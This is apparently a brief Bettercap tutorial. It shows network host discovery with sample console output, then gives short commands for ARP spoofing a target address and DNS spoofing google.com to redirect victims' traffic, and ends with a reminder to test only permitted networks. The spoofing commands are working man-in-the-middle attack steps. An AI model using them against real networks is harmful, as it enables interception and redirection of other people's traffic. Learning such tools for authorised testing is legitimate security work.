Getting Started with Bettercap

Installation

To begin using Bettercap, you'll need to install it first. Here's how:

install bettercap
sudo bettercap

Network Probing

The net.probe command is essential for discovering devices on your network. When activated, it automatically starts net.recon and begins probing addresses on your network.

net.probe on
				
192.168.88.0/24 > 192.168.88.81  » net.probe on 
			
192.168.88.0/24 > 192.168.88.81  » [21:26:59] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
192.168.88.0/24 > 192.168.88.81  » [21:26:59] [sys.log] [inf] net.probe probing 256 addresses on 192.168.88.0/24
192.168.88.0/24 > 192.168.88.81  » [21:26:59] [endpoint.new] endpoint 192.168.88.1 detected as 76:ac:b9:1f:38:2a.
192.168.88.0/24 > 192.168.88.81  » [21:27:01] [endpoint.new] endpoint 192.168.88.138 detected as bc:24:11:8c:a4:60.
192.168.88.0/24 > 192.168.88.81  » [21:27:01] [endpoint.new] endpoint 192.168.88.171 detected as 6c:4b:90:58:0f:9a (LiteON).
			
	192.168.88.0/24 > 192.168.88.81  » net.show

		┌────────────────┬───────────────────┬─────────┬────────┬───────┬───────┬──────────┐
		│      IP ▴      │        MAC        │  Name   │ Vendor │ Sent  │ Recvd │   Seen   │
		├────────────────┼───────────────────┼─────────┼────────┼───────┼───────┼──────────┤
		│ 192.168.88.81  │ bc:24:11:65:a7:75 │ ens18   │        │ 0 B   │ 0 B   │ 21:26:54 │
		│                │                   │         │        │       │       │          │
		│ 192.168.88.1   │ 76:ac:b9:1f:38:2a │         │        │ 699 B │ 384 B │ 21:27:04 │
		│ 192.168.88.138 │ bc:24:11:8c:a4:60 │ debian. │        │ 120 B │ 92 B  │ 21:27:01 │
		│ 192.168.88.171 │ 6c:4b:90:58:0f:9a │         │ LiteON │ 120 B │ 92 B  │ 21:27:01 │
		└────────────────┴───────────────────┴─────────┴────────┴───────┴───────┴──────────┘

This will output information about discovered devices, including their IP addresses and MAC addresses.

Viewing Network Information

To see all discovered devices and their details, use the net.show command. This displays a comprehensive table with:

  • IP Addresses
  • MAC Addresses
  • Device Names
  • Vendors
  • Traffic Statistics
  • Last Seen Timestamps

ARP Spoofing

To monitor traffic from a specific target:

set arp.spoof.targets 192.168.88.138
arp.spoof on

DNS Spoofing

To redirect traffic for specific domains to your machine:

set dns.spoof.domains google.com
dns.spoof on

Remember to use these tools responsibly and only on networks you own or have permission to test.